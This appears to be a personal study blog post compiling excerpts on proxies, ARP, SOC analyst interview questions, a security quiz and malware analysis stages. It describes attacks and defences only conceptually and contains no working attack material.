Wednesday, July 21, 2021

proxy server

  •  Forward proxy


A forward proxy is the most common form of a proxy server and is generally used to pass requests from an isolated, private network to the Internet through a firewall. Using a forward proxy, requests from an isolated network, or intranet, can be rejected or allowed to pass through a firewall. 


A forward proxy server will first check to make sure a request is valid. If a request is not valid, or not allowed (blocked by the proxy), it will reject the request resulting in the client receiving an error or a redirect. If a request is valid, a forward proxy may check if the requested information is cached. If it is, the forward proxy serves the cached information. If it is not, the request is sent through a firewall to an actual content server which serves the information to the forward proxy. The proxy, in turn, relays this information to the client and may also cache it, for future requests.


Reverse proxy


A reverse proxy is another common form of a proxy server and is generally used to pass requests from the Internet, through a firewall to isolated, private networks. It is used to prevent Internet clients from having direct, unmonitored access to sensitive data residing on content servers on an isolated network, or intranet

If caching is enabled, a reverse proxy can also lessen network traffic by serving cached information rather than passing all requests to actual content servers. 

Reverse proxy servers may also balance workload by spreading requests across a number of content servers.  

One advantage of using a reverse proxy is that Internet clients do not know their requests are being sent to and handled by a reverse proxy server. 


The above image shows a reverse proxy configuration. An Internet client initiates a request to Server A (Proxy Server) which, unknown to the client, is actually a reverse proxy server. The request is allowed to pass through the firewall and is valid but is not cached on Server A. The reverse proxy (Server A) requests the information from Server B (Content Server), which has the information the Internet client is requesting. The information is served to the reverse proxy, where it is cached, and relayed through the firewall to the client. Future requests for the same information will be fulfilled by the cache, lessening network traffic and load on the content server (proxy caching is optional and not necessary for proxy to function on your HTTP Server). In this example, all information originates from one content server (Server B).


Proxy chaining


A proxy chain uses two or more proxy servers to assist in server and protocol performance and network security. Proxy chaining is not a type of proxy, but a use of reverse and forward proxy servers across multiple networks. In addition to the benefits to security and performance, proxy chaining allows requests from different protocols to be fulfilled in cases where, without chaining, such requests would not be possible or permitted. 


For example, a request using HTTP is sent to a server that can only handle FTP requests. In order for the request to be processed, it must pass through a server that can handle both protocols. This can be accomplished by making use of proxy chaining which allows the request to be passed from a server that is not able to fulfill such a request (perhaps due to security or networking issues, or its own limited capabilities) to a server that can fulfill such a request. 


https://www.ibm.com/docs/en/i/7.2?topic=concepts-proxy-server-types








How does ARP work?

  •  How ARP works

When a new computer joins a LAN, it is assigned a unique IP address to use for identification and communication

When an incoming packet destined for a host machine on a particular LAN arrives at a gateway, the gateway asks the ARP program to find a MAC address that matches the IP address

A table called the ARP cache maintains a record of each IP address and its corresponding MAC address.

All operating systems in an IPv4 Ethernet network keep an ARP cache.

Every time a host requests a MAC address in order to send a packet to another host in the LAN, it checks its ARP cache to see if the IP to MAC address translation already exists.

If the translation does not already exist, then the request for network addresses is sent and ARP is performed.


ARP broadcasts a request packet to all the machines on the LAN and asks if any of the machines know they are using that particular IP address. When a machine recognizes the IP address as its own, it sends a reply so ARP can update the cache for future reference and proceed with the communication.


Host machines that don't know their own IP address can use the Reverse ARP (RARP) protocol for discovery.


When an ARP inquiry packet is broadcast, the routing table is examined to find which device on the LAN can reach the destination fastest. This device, which is often a router, becomes a gateway for forwarding packets outside the network to their intended destinations.


ARP spoofing and ARP cache poisoning

Any LAN that uses ARP must be wary of ARP spoofing, also referred to as ARP poison routing or ARP cache poisoning.

ARP spoofing is a device attack in which a hacker broadcasts false ARP messages over a LAN in order to link an attacker's MAC address with the IP address of a legitimate computer or server within the network. Once a link has been established, the target computer can send frames meant for the original destination to the hacker's computer first as well as any data meant for the legitimate IP address.


https://searchnetworking.techtarget.com/definition/Address-Resolution-Protocol-ARP





ARP Request


ARP Reply


  • RARP: Its opposite of normal ARP that we have discussed. That means you have MAC address of PC2 but you do not have IP address of PC2. Some specific cases need RARP.

https://linuxhint.com/arp_packet_analysis_wireshark/

  • The Reverse Address Resolution Protocol (RARP) is an obsolete computer communication protocol used by a client computer to request its Internet Protocol (IPv4) address from a computer network, when all it has available is its link layer or hardware address, such as a MAC address. The client broadcasts the request and does not need prior knowledge of the network topology or the identities of servers capable of fulfilling its request.

https://en.wikipedia.org/wiki/Reverse_Address_Resolution_Protocol



  • Configuring Gratuitous ARP
Gratuitous Address Resolution Protocol (ARP) requests help detect duplicate IP addresses.
A gratuitous ARP is a broadcast request for a router’s own IP address. If a router or switch sends an ARP request for its own IP address and no ARP replies are received, the router- or switch-assigned IP address is not being used by other nodes

However, if a router or switch sends an ARP request for its own IP address and an ARP reply is received, the router- or switch-assigned IP address is already being used by another node.


https://www.juniper.net/documentation/us/en/software/junos/multicast-l2/topics/task/interfaces-configuring-gratuitous-arp.html

  • Gratuitous ARP
Gratuitous ARP could mean both gratuitous ARP request or gratuitous ARP reply. Gratuitous in this case means a request/reply that is not normally needed according to the ARP specification (RFC 826) but could be used in some cases. 

A gratuitous ARP request is an AddressResolutionProtocol request packet where the source and destination IP are both set to the IP of the machine issuing the packet and the destination MAC is the broadcast address ff:ff:ff:ff:ff:ff.

Gratuitous ARPs are useful for four reasons:

They can help detect IP conflicts. When a machine receives an ARP request containing a source IP that matches its own, then it knows there is an IP conflict.

They assist in the updating of other machines' ARP tables. Clustering solutions utilize this when they move an IP from one NIC to another, or from one machine to another. Other machines maintain an ARP table that contains the MAC associated with an IP. When the cluster needs to move the IP to a different NIC, be it on the same machine or a different one, it reconfigures the NICs appropriately then broadcasts a gratuitous ARP reply to inform the neighboring machines about the change in MAC for the IP. Machines receiving the ARP packet then update their ARP tables with the new MAC

They inform switches of the MAC address of the machine on a given switch port, so that the switch knows that it should transmit packets sent to that MAC address on that switch port.


Every time an IP interface or link goes up, the driver for that interface will typically send a gratuitous ARP to preload the ARP tables of all other local hosts. Thus, a gratuitous ARP will tell us that that host just has had a link up event, such as a link bounce, a machine just being rebooted or the user/sysadmin on that host just configuring the interface up. If we see multiple gratuitous ARPs from the same host frequently, it can be an indication of bad Ethernet hardware/cabling resulting in frequent link bounces

https://wiki.wireshark.org/Gratuitous_ARP


Ports and Protocols

  •  This is a list of TCP and UDP port numbers used by protocols for operation of network applications.

https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers




soc analyst interview question

  •  1. Explain risk, vulnerability and threat?

Vulnerability (weakness) is a gap in the protection efforts of a system, a threat is an attacker who exploits that weakness. Risk is the measure of potential loss when that the vulnerability is exploited by the threat


2. What is the difference between Asymmetric and Symmetric encryption and which one is better?

Symmetric encryption uses the same key for both encryption and decryption, while Asymmetric encryption uses different keys for encryption and decryption.

Symmetric is usually much faster but the key needs to be transferred over an unencrypted channel. Asymmetric on the other hand is more secure but slow. 

Hence, a hybrid approach should be preferred. Setting up a  channel using asymmetric encryption and then sending the data using a symmetric process.


4. What is XSS, how will you mitigate it?

Cross site scripting is a JavaScript vulnerability in web applications.

when a user enters a script in the client-side input fields and that input gets processed without getting validated. 

This leads to untrusted data getting saved and executed on the client-side. Countermeasures of XSS are input validation, implementing a CSP (Content security policy)


5. What is the difference between encryption and hashing?

Encryption is reversible whereas hashing is irreversible. Hashing can be cracked using rainbow tables and collision attacks but is not reversible.

Encryption ensures confidentiality whereas hashing ensures Integrity.


7. What is CSRF?

Cross-Site Request Forgery is a web application vulnerability in which the server does not check whether the request came from a trusted client or not. The request is just processed directly


13. CIA triangle?

Confidentiality: Keeping the information secret.

Integrity: Keeping the information unaltered.

Availability: Information is available to the authorised parties at all times.


14. HIDS vs NIDS and which one is better and why?

HIDS is a host intrusion detection system and NIDS is a network intrusion detection system. Both the systems work on similar lines. It’s just that the placement is different. HIDS is placed on each host whereas NIDS is placed in the network. For an enterprise, NIDS is preferred as HIDS is difficult to manage, plus it consumes the processing power of the host as well.


20. Various response codes from a web application?

1xx – Informational responses

2xx – Success

3xx – Redirection

4xx – Client-side error

5xx – Server side error



30. What is a false positive and false negative in case of IDS?

When the device generated an alert for an intrusion that has actually not happened: this is a false positive and if the device has not generated any alert and the intrusion has actually happened, this is the case of a false negative.


 

https://www.siemxpert.com/blog/soc-analyst-interview-question/


  • Question 4: What is the three-way handshake?

Three-way handshake mechanism: In this mechanism, the client sends an SYN TCP packet to the server asking for a connection (synchronizing) request and a sequence number. The server responds with the SYN/ACK packet, acknowledging the connection request and assigning a sequence number. The client again sends an ACK packet to accept the response of the server.


Question 6: What is data leakage? Explain in your own words.

Answer: Data leakage refers to the exposure or transmission of an organization’s sensitive data to the external recipient. The data may be transmitted or exposed via the internet or by physical means.


Question 7: List the steps to develop the Data Loss Prevention (DLP) strategy?

Answer: The steps to develop and implement a DLP strategy are as follows:

Step1: prioritizing the critical data assets

Step2: categorizing the data based on its source

Step3: analyzing which data is more prone to the risks

Step4: monitor the transmission of the data

Step5: developing control measures to mitigate the data leakage risk


Question 8: What is the difference between TCP and UDP?


TCP(Transfer Layer Protocol)

TCP is reliable as it guarantees the delivery of data packets to the destination.

TCP is heavyweight.

TCP is slower as compared to UDP

Example: HTTP, SSH, HTTPS, SMTP


UDP(User Datagram Protocol)

UDP is not reliable as it does not guarantees the delivery of data packets to the destination

UDP is lightweight.

UDP IS faster than TCP

Example: TFTP, VoIP, online multiplayer gamess


Question 9: What is the difference between firewall deny and drop?

Answer: DENY RULE: If the firewall is set to deny rule, it will block the connection and send a reset packet back to the requester. The requester will know that the firewall is deployed.

DROP RULE: If the firewall is set to drop rule, it will block the connection request without notifying the requester.

It is best to set the firewall to deny the outgoing traffic and drop the incoming traffic so that attacker will not know whether the firewall is deployed or not.


Question 11: What is the Runbook in SOC?

A runbook, also known as a standard operating procedure (SOP), consists of a set of guidelines to handle security incidents and alerts in the Security Operation Centre. The L1 security analyst generally uses it for better assessment and documentation of the security events.


Question 12: What is the difference between the Red Team and the Blue Team?

Red Team: The red team plays an offensive role. The team conducts rigorous exercises to penetrate the security infrastructure and identify the exploitable vulnerabilities in it. The red team is generally hired by the organization to test the defenses.

Blue Team: The blue team plays a defensive role. The blue team’s role is to defend the organization’s security infrastructure by detecting the intrusion. The members of a blue team are internal security professionals of the organization.


Question 13: Define a Phishing attack and how to prevent it?

Answer: Phishing is a type of social engineering attack in which an attacker obtains sensitive information from the target by creating urgency, using threats, impersonation, and incentives. Spear phishing, e-mail spam, session hijacking, smishing, and vishing are types of phishing attacks.


Question 14: What is the Cross-Site Scripting (XSS) attack, and how to prevent it?

Answer: Cross-site Scripting: In the cross-site scripting attack, the attacker executes the malicious scripts on a web page and can steal the user’s sensitive information. With XSS vulnerability, the attacker can inject Trojan, read out user information, and perform specific actions such as the website’s defacement.


Countermeasures:

    Encoding the output

    Applying filters at the point where input is received

    Using appropriate response headers

    Enabling content security policy

    Escaping untrusted characters



Question 15: Explain the SQL injection vulnerability and give countermeasures to prevent it?

Answer: SQL Injection: SQL injection is a famous vulnerability in the web application that allows hackers to interfere in communication taking place between a web application and its database. Hackers inject malicious input into the SQL statement to compromise the SQL database. They can retrieve, alter, or modify the data. In some cases, it allows attackers to perform DDOS attacks.


Countermeasures:

    Using parameterized queries

    Validating the inputs

    Creating stored procedures

    Deploying a web application firewall

    Escaping untrusted characters


Question 16: Difference between hashing and Encryption?


Hashing

Conversion of data into a fixed-length of unreadable strings using algorithms

Hashed data can not be reverted back into readable strings

The length of the hashed string is fixed

No keys are used in hashing


Encryption

Conversion of data into an unreadable string using cryptographic keys

strings Encrypted data can be decrypted back into readable strings

The length of the encrypted string is not fixed

Keys are used in Encryption


Question 18: What is the difference between SIEM and IDS?

Both collect the log data, but unlike SIEM, IDS does not facilitate event correlation and centralization of log data.


Question 20: What is DNS? Why is DNS monitoring essential?

DNS monitoring can disclose information such as websites visited by the employee, malicious domain accessed by an end-user, malware connecting to Command & Control server. It can help in identifying and thwarting cyberattacks.


https://www.infosectrain.com/blog/20-most-common-soc-analyst-interview-questions-and-answers/ 


  • How does a Web Application Firewall work?
A WAF examines and filters traffic to web applications. It keeps track of communication between the client and server, and server and server
A WAF protects against some of the most common cyber attacks, including SQL injections, cross-site scripting and (D)DoS attacks
When you first define communication and access, you let the WAF monitor traffic for a period of time so that it can learn what legitimate traffic looks like. It then creates a default mode and the WAF can then keep track of unusual traffic patterns

What are the differences between Web Application Firewalls and traditional firewalls?
Application firewalls are on a higher level in the OSI model compared to traditional firewalls.
If a new type of hacker attack is discovered you can update the WAF software with the attack signature, which enables it to learn the patterns of that traffic and block it. 

What are the benefits of using a WAF?
Many agree that it is better to protect the application itself than the server itself. This allows for a deeper level of detail compared to traditional firewalls, thus giving a more ‘fine tune’ protection. A Web Application Firewall prevents data loss, data corruption and spoofing.

https://complior.se/questions-and-answers-about-waf/
There are several types of firewalls but the most common one is the hardware network firewall. 
Basic firewalls work at Layer 3 and Layer 4 of the OSI model

a network firewall is stateful. This means that the firewall keeps track of the states of connections that pass through it.
For example, if an internal host successfully accesses an Internet website through the firewall, the latter will keep the connection inside its connection table so that reply packets from the external web server will be allowed to pass to the internal host because they already belong to an established connection.

Next-Generation Firewalls work all the way up to Layer 7 of the OSI models which means they are able to inspect and control traffic at the application level.

That's why the IPS is connected in line to the packet flow. As shown from the network topology above (Firewall with IPS), the IPS device is usually connected behind the firewall but in-line the communication path which transmits packets to/from the internal network.

Usually, an IPS is signature-based which means that it has a database of known malicious traffic, attacks, and exploits and if it sees packets matching a signature then it blocks the traffic flow.
an IPS can work with statistical anomaly detection, rules set by the administrator, etc.

An IDS (Intrusion Detection System) is the predecessor of IPS and is passive in nature. As shown from the network above (Firewall with IDS), this device is not inserted in-line with the traffic but rather it is in parallel (placed out-of-band).

Traffic passing through the switch is also sent at the same time to the IDS for inspection. If a security anomaly is detected in the network traffic, the IDS will just raise an alarm (to the administrator) but it will not be able to block the traffic
Similar to IPS, the IDS device also uses mostly signatures of known security attacks and exploits in order to detect an intrusion attempt.
In order to send traffic to the IDS, the switch device must have a SPAN port configured in order to copy traffic and send it towards the IDS node.

For example, an IDS can send a command to the firewall in order to block specific packets if the IDS detects an attack.

Since most websites nowadays use SSL (HTTPS), the WAF is able also to provide SSL acceleration and also SSL inspection by terminating the SSL session and inspect the traffic inside the connection on the WAF itself.
As shown from the network above (Firewall with WAF), it is placed in front of a Website (usually) in a DMZ zone of a firewall.

https://forum.huawei.com/enterprise/en/comparison-and-differences-between-ips-vs-ids-vs-firewall-vs-waf/thread/763619-867

. Which of these protocols is a connection-oriented protocol? The Correct Answer is:- D

  • A) FTP
  • B) UDP
  • C) POP3
  • D) TCP 

What port range is an obscure third-party application most likely to use? The Correct Answer is:- D

  • A) 1 to 1024
  • B) 1025 to 32767
  • C) 32768 to 49151
  • D) 49152 to 65535 

 Which category of firewall filters is based on packet header data only? The Correct Answer is:- C

  • A) Stateful
  • B) Application
  • C) Packet
  • D) Proxy 

At which layer of the OSI model does a proxy operate? The Correct Answer is:- D

  • A) Physical
  • B) Network
  • C) Data Link
  • D) Application 

Which technology allows the use of a single public address to support many internal clients while also preventing exposure of internal IP addresses to the outside world? The Correct Answer is:- D

  • A) VPN
  • B) Tunneling
  • C) NTP
  • D) NAT 

 What item is also referred to as a logical address to a computer system? The Correct Answer is:- A

  • A) IP address
  • B) IPX address
  • C) MAC address
  • D) SMAC address 

Which of the following is commonly used to create thumbprints for digital certificates? The Correct Answer is:- A

  • A) MD5
  • B) MD7
  • C) SHA12
  • D) SHA8 

Which of the following creates a fixed-length output from a variable-length input? The Correct Answer is:- A

  • A) MD5
  • B) MD7
  • C) SHA12
  • D) SHA8 

What encryption process uses one piece of information as a carrier for another? The Correct Answer is:- A

  • A) Steganography
  • B) Hashing
  • C) MDA
  • D) Cryptointelligence 

Which of the following is a major security problem with FTP? The Correct Answer is:- C

  • A) Password files are stored in an unsecure area on disk.
  • B) Memory traces can corrupt file access.
  • C) User IDs and passwords are unencrypted.
  • D) FTP sites are unregistered. 

What type of program exists primarily to propagate and spread itself to other systems and can do so without interaction from users? The Correct Answer is:- D

  • A) Virus
  • B) Trojan horse
  • C) Logic bomb
  • D) Worm  

Which mechanism is used by PKI to allow immediate verification of a certificate’s validity? D) OCSP

  • A) CRL
  • B) MD5
  • C) SSHA
  • D) OCSP  

Which statement(s) defines malware most accurately? The Correct Answer is:- B,C

  • A) Malware is a form of virus.
  • B) Trojans are malware.
  • C) Malware covers all malicious software.
  • D) Malware only covers spyware. 

 Which is/are a characteristic of a virus? Which is/are a characteristic of a virus?

  • A) A virus is malware.
  • B) A virus replicates on its own.
  • C) A virus replicates with user interaction.
  • D) A virus is an item that runs silently.

A polymorphic virus __________. The Correct Answer is:- C

  • A) Evades detection through backdoors
  • B) Evades detection through heuristics
  • C) Evades detection through rewriting itself
  • D) Evades detection through luck 

A sparse infector virus __________. The Correct Answer is:- C

  • A) Creates backdoors
  • B) Infects data and executables
  • C) Infects files selectively
  • D) Rewrites itself 
how to protect data layer at Layer 2 OSI?
encryption
what security controls can you implement at layer 7 OSI?
wef,proxies,content delivery network-cdn
what protocols are used at transport layer OSI?
tcp udp 
SNMP is a layer 7 (Application )protocol
ICMP is a layer 3 protocol (Network)


malware analysis

  •  What is Malware Analysis?


Malware analysis is the process of understanding the behavior and purpose of a suspicious file or URL. The output of the analysis aids in the detection and mitigation of the potential threat



    Pragmatically triage incidents by level of severity

    Uncover hidden indicators of compromise (IOCs) that should be blocked

    Improve the efficacy of IOC alerts and notifications

    Enrich context when threat hunting


Types of Malware Analysis


Static Analysis


Basic static analysis does not require that the code is actually run. Instead, static analysis examines the file for signs of malicious intent. It can be useful to identify malicious infrastructure, libraries or packed files.


Technical indicators are identified such as file names, hashes, strings such as IP addresses, domains, and file header data can be used to determine whether that file is malicious.


tools like disassemblers and network analyzers can be used to observe the malware without actually running it in order to collect information on how the malware works.


since static analysis does not actually run the code, sophisticated malware can include malicious runtime behavior that can go undetected.

For example, if a file generates a string that then downloads a malicious file based upon the dynamic string, it could go undetected by a basic static analysis. 


Dynamic Analysis

Dynamic malware analysis executes  suspected malicious code in a safe environment called a sandbox

This closed system enables security professionals to watch the malware in action without the risk of letting it infect their system or escape into the enterprise network.

Dynamic analysis provides threat hunters and incident responders with deeper visibility, allowing them to uncover the true nature of a threat. 

As a secondary benefit, automated sandboxing eliminates the time it would take to reverse engineer a file to discover the malicious code.


The challenge with dynamic analysis is that adversaries are smart, and they know sandboxes are out there, so they have become very good at detecting them. To deceive a sandbox, adversaries hide code inside them that may remain dormant until certain conditions are met. Only then does the code run.


Hybrid Analysis (includes both of the techniques above)


For example, one of the things hybrid analysis does is apply static analysis to data generated by behavioral analysis – like when a piece of malicious code runs and generates some changes in memory. Dynamic analysis would detect that, and analysts would be alerted to circle back and perform basic static analysis on that memory dump. As a result, more IOCs would be generated and zero-day exploits would be exposed.


Malware Analysis Use Cases


Malware Detection

By providing deep behavioral analysis and by identifying shared code, malicious functionality or infrastructure, threats can be more effectively detected.

In addition, an output of malware analysis is the extraction of IOCs. The IOCs may then be fed into SEIMs, threat intelligence platforms (TIPs) and security orchestration tools to aid in alerting teams to related threats in the future.


Threat Alerts and Triage

Malware analysis solutions provide higher-fidelity alerts earlier in the attack life cycle. Therefore, teams can save time by prioritizing the results of these alerts over other technologies.


Incident Response

The goal of the incident response (IR) team is to provide root cause analysis, determine impact and succeed in remediation and recovery. The malware analysis process aids in the efficiency and effectiveness of this effort.


Threat Hunting

Malware analysis can expose behavior and artifacts that threat hunters can use to find similar activity, such as access to a particular network connection, port or domain. By searching firewall and proxy logs or SIEM data, teams can use this data to find similar  threats.


Stages of Malware Analysis


Static Properties Analysis

Static properties include strings embedded in the malware code, header details, hashes, metadata, embedded resources, etc. This type of data may be all that is needed to create IOCs, and they can be acquired very quickly because there is no need to run the program in order to see them.


Interactive Behavior Analysis

Behavioral analysis is used to observe and interact with a malware sample running in a lab. Analysts seek to understand the sample’s registry, file system, process and network activities. They may also conduct memory forensics to learn how the malware uses memory. If the analysts suspect that the malware has a certain capability, they can set up a simulation to test their theory.


Fully Automated Analysis


Manual Code Reversing

analysts reverse-engineer code using debuggers, disassemblers, compilers and specialized tools to decode encrypted data, determine the logic behind the malware algorithm  and understand any hidden capabilities that the malware has not yet exhibited. 



https://www.crowdstrike.com/cybersecurity-101/malware/malware-analysis/

  • Understand Where You Currently Fit Into the Malware Analysis Process


    Fully-Automated Analysis: Run (“detonate”) the suspicious file in an automated analysis environment (“sandbox”) to get a report on its activities, such as its interaction with the file system and network.

    Static Properties Analysis: Examine metadata and other details embedded in the file (e.g., strings) without running it, so you can spot the areas you might want to examine more deeply in subsequent steps.

    Interactive Behavior Analysis: Run the file in an isolated laboratory environment, which you fully control, tweaking the lab’s configuration in a series of iterative experiments to study the specimen’s behavior.

    Manual Code Reversing: Examine the code that comprises the file, often with the help of a disassembler and a debugger, to understand its key capabilities and fill in the gaps left from the earlier analysis steps.


Memory, file system, and network forensics efforts (when applicable) also contribute to the understanding.


https://www.sans.org/blog/how-you-can-start-learning-malware-analysis/


  • Intro to Malware Analysis: What It Is & How It Works


There are a few key reasons to perform malware analysis:


    Malware detection — To better protect your organization, you need to be able to identify compromising threats and vulnerabilities.

    Threat response — To help you understand how these threats work so you can react accordingly to them.

    Malware research — This can help you to better understand how specific types of malware work, where they originated, and what differentiates them.


What Is Malware?

Malware is any piece of software that’s harmful to your system — worms, viruses, trojans, spyware, etc

Malware analysis can help you to determine if a suspicious file is indeed malicious, study its origin, process, capabilities, and assess its impact to facilitate detection and prevention.


The Two Types of Malware Analysis Techniques: Static vs. Dynamic


There are two ways to approach the malware analysis process — using static analysis or dynamic analysis. With static analysis, the malware sample is examined without detonating it, whereas, with dynamic analysis, the malware is actually executed in a controlled, isolated environment.



Static Malware Analysis

The malware components and properties are analyzed without running the code

Static malware analysis is signature-based — i.e., the signature of the malware binary is determined by calculating the cryptographic hash.

The malware binary can be reverse-engineered by using a disassembler.

Static malware analysis involves virus scanning, fingerprinting, memory dumping, etc.


Dynamic Malware Analysis

The malware is executed within a virtual environment, and its behavior is observed.

Dynamic malware analysis takes a behavior-based approach to malware detection and analysis.

The malware binary can be reverse-engineered using disassemblers and debuggers to understand and control certain aspects of the program when executing.

Dynamic malware analysis involves registry changes, API calls, memory writes, etc.

It is more effective and provides a higher detection rate than static analysis


The Four Stages of Malware Analysis


Stage One: Fully Automated Analysis

Automated malware analysis refers to relying on detection models formed by analyzing previously discovered malware samples

Fully automated analysis can be done using tools like Cuckoo Sandbox, an open-source automated malware analysis platform that can be tweaked to run custom scripts and generate comprehensive reports.


Stage Two: Static Properties Analysis

Static properties analysis involves looking at a file’s metadata without executing the malware

One of the free tools that you may find useful for this purpose is PeStudio. This tool flags suspicious artifacts within executable files and is designed for automated static properties analysis. PeStudio presents the file hashes that can be used to search VirusTotal, TotalHash, or other malware repositories to see if the file has previously been analyzed.


Stage Three: Interactive Behavior Analysis

the malware sample is executed in isolation as the analyst observes how it interacts with the system and the changes it makes.

Often, a piece of malware might refuse to execute if it detects a virtual environment or might be designed to avoid execution without manual interaction (i.e., in an automated environment)


There are several types of actions that should immediately raise a red flag, including:


    Adding or modifying new or existing files,

    Installing new services or processes, and

    Modifying the registry or changing system settings.


Some types of malware might try to connect to suspicious host IPs that don’t belong to the environments. Others might also try to create mutex objects to avoid infecting the same host multiple times (to preserve operational stability). These findings are relevant indicators of compromise.


Some of the tools that you can use include:


    Wireshark for observing network packets,

    Process Hacker to observe the processes that are executing in memory,

    Process Monitor to observe real-time file system, registry, process activity for Windows, and

    ProcDot to provide an interactive and graphical representative of all recorded activities.



Stage Four: Manual Code Reversing


This process can:


    Shed some light on the logic and algorithms the malware uses,

    Expose hidden capabilities and exploitation techniques the malware uses, and

    Provide insights about the communication protocol between the client and the server on the command and control side.


Typically, to manually reverse the code, analysts make use of debuggers and disassemblers. 


How to Prevent Malware Infection


Keep your systems and applications up to date.

Stay wary of social engineering attacks that can compromise your data

Perform regular scans on your systems using antivirus, anti-malware solutions

Employ security best practices like using a secure connection, blocking ads, etc. 

Create backups for all your business-critical data

https://sectigostore.com/blog/malware-analysis-what-it-is-how-it-works/


  • Free Automated Malware Analysis Sandboxes and Services

Automated malware analysis tools, such as analysis sandboxes, save time and help with triage during incident response and forensic investigations

https://zeltser.com/automated-malware-analysis/



  • Free Blocklists of Suspected Malicious IPs and URLs

Several organizations maintain and publish free blocklists of IP addresses and URLs of systems and networks suspected in malicious activities on-line

https://zeltser.com/malicious-ip-blocklists/


  • Free Online Tools for Looking up Potentially Malicious Websites

Several organizations offer free online tools for looking up a potentially malicious website. Some of these tools provide historical information; others examine the URL in real time to identify threats

https://zeltser.com/lookup-malicious-websites/






What about malware variations that have not yet been seen? Signature-based detection methods will not work. To detect these types of threats, vendors created Sandboxing products, which take a suspect file and place it in an environment where its behaviors can be closely analyzed. If the file does something malicious while in the sandbox, it is flagged as malware. This is known as Heuristic detection, and it looks for anomaly behavior that is out of the ordinary. In fact, vendors create proprietary heuristic algorithms that can detect never before seen polymorphic samples of malware


https://training.fortinet.com/pluginfile.php/1624915/mod_scorm/content/1/story_content/external_files/NSE%202%20TIS%20Script_EN.pdf